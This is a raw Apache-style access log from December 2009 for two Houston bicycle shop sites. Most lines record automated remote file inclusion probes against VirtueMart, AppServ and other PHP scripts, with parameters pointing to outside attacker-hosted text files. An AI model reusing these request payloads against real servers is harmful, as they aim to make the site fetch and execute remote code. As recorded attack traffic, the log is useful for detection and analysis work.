91.142.213.4 - - [11/Dec/2009:19:12:57 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:19:12:57 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:19:22:05 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:22:05 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:22:05 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:22:46 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:19:22:46 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:19:22:46 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:19:25:07 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:26:02 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
93.190.41.101 - - [11/Dec/2009:19:28:05 -0800] "GET /appserv/main.php?appserv_root=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:19:28:05 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [11/Dec/2009:19:28:05 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Dec/2009:19:30:18 -0800] "GET /logs/errors.php?error=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Dec/2009:19:30:19 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Dec/2009:19:33:47 -0800] "GET /errors.php?error=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Dec/2009:19:33:47 -0800] "GET /logs/errors.php?error=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Dec/2009:19:33:48 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [11/Dec/2009:19:37:19 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.redglove.it//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [11/Dec/2009:19:37:19 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.redglove.it//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [11/Dec/2009:19:37:19 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.redglove.it//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [11/Dec/2009:19:41:21 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.redglove.it//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [11/Dec/2009:19:41:30 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.redglove.it//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [11/Dec/2009:19:41:30 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.redglove.it//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [11/Dec/2009:19:41:30 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.redglove.it//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:44:42 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:44:42 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:44:42 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [11/Dec/2009:19:45:41 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.redglove.it//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:45:55 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:45:55 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:45:57 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:48:22 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:50:30 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:52:48 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:19:52:48 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:19:52:48 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:19:53:22 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:53:22 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:19:53:22 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:53:38 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:53:38 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:53:38 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:19:54:11 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:19:54:11 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:19:54:12 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:19:56:08 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:19:56:08 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:19:56:09 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:19:57:22 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:20:04:59 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [11/Dec/2009:20:05:01 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [11/Dec/2009:20:09:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.reducereuserecycle.com.au/core/test.txt? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "houstonbikeshop.com"
211.234.106.119 - - [11/Dec/2009:20:09:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.reducereuserecycle.com.au/core/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "houstonbikeshop.com"
67.19.173.34 - - [11/Dec/2009:20:14:47 -0800] "GET /logs/access.log///appserv/http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.173.34 - - [11/Dec/2009:20:14:47 -0800] "GET //appserv/http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.173.34 - - [11/Dec/2009:20:14:47 -0800] "GET /logs///appserv/http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:20:17:48 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:20:17:55 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:20:17:55 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:20:17:55 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.193.129 - - [11/Dec/2009:20:22:25 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:20:24:10 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:20:24:11 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:20:24:11 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [11/Dec/2009:20:28:59 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.173.34 - - [11/Dec/2009:20:33:50 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.173.34 - - [11/Dec/2009:20:33:50 -0800] "GET //appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.173.34 - - [11/Dec/2009:20:33:50 -0800] "GET /logs///appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:20:45:46 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [11/Dec/2009:20:46:27 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:20:53:58 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:20:53:58 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [11/Dec/2009:20:53:58 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.30.198.28 - - [11/Dec/2009:21:35:39 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Dec/2009:21:35:39 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.30.198.28 - - [11/Dec/2009:21:35:39 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.51.194 - - [11/Dec/2009:21:37:01 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.51.194 - - [11/Dec/2009:21:37:01 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 200 2375 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.19.51.194 - - [11/Dec/2009:21:37:01 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/02.06.09/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.184.140 - - [11/Dec/2009:21:47:53 -0800] "GET /logs///?path=http://n34.biz/id1.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.184.140 - - [11/Dec/2009:21:47:53 -0800] "GET /logs/access.log///?path=http://n34.biz/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.184.140 - - [11/Dec/2009:21:47:53 -0800] "GET //?path=http://n34.biz/id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.184.140 - - [11/Dec/2009:21:49:08 -0800] "GET /logs/access.log%20%20///?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.184.140 - - [11/Dec/2009:21:49:08 -0800] "GET //?path=http://n34.biz/id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.184.140 - - [11/Dec/2009:21:49:08 -0800] "GET /logs///?path=http://n34.biz/id1.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.113.205.139 - - [11/Dec/2009:21:54:46 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.113.205.139 - - [11/Dec/2009:21:54:47 -0800] "GET //appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.113.205.139 - - [11/Dec/2009:21:54:47 -0800] "GET /logs///appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:22:05:23 -0800] "GET ////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:22:05:24 -0800] "GET /logs/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [11/Dec/2009:22:05:24 -0800] "GET /logs/access.log%20%20/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.16.135.210 - - [11/Dec/2009:22:14:33 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.16.135.210 - - [11/Dec/2009:22:14:33 -0800] "GET //appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.16.135.210 - - [11/Dec/2009:22:14:34 -0800] "GET /logs///appserv/main.php?appserv_root=http://art.srru.ac.th/images/blank.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.64.117 - - [11/Dec/2009:22:18:38 -0800] "GET /zero_vote/ask_password.php?dir=http://n34.biz/id2.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.64.117 - - [11/Dec/2009:22:18:38 -0800] "GET /logs/access.log%20%20//zero_vote/ask_password.php?dir=http://n34.biz/id2.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.64.117 - - [11/Dec/2009:22:18:38 -0800] "GET /logs//zero_vote/ask_password.php?dir=http://n34.biz/id2.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.64.117 - - [11/Dec/2009:22:19:53 -0800] "GET /logs//zero_vote/ask_password.php?dir=http://n34.biz/id2.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.64.117 - - [11/Dec/2009:22:19:53 -0800] "GET /zero_vote/ask_password.php?dir=http://n34.biz/id2.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.64.117 - - [11/Dec/2009:22:19:53 -0800] "GET /logs/access.log%20%20//zero_vote/ask_password.php?dir=http://n34.biz/id2.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Dec/2009:22:21:46 -0800] "GET /logs/access.log%20%20//zero_vote/ask_password.php?dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Dec/2009:22:21:46 -0800] "GET /logs//zero_vote/ask_password.php?dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Dec/2009:22:21:46 -0800] "GET /zero_vote/ask_password.php?dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Dec/2009:22:21:46 -0800] "GET /logs/access.log%20%20//zero_vote/ask_password.php?dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Dec/2009:22:21:46 -0800] "GET /zero_vote/ask_password.php?dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Dec/2009:22:21:46 -0800] "GET /logs//zero_vote/ask_password.php?dir=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.193.75 - - [11/Dec/2009:22:22:23 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [11/Dec/2009:22:24:25 -0800] "GET /bullitinboard/viewtopic.php?p=4307 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
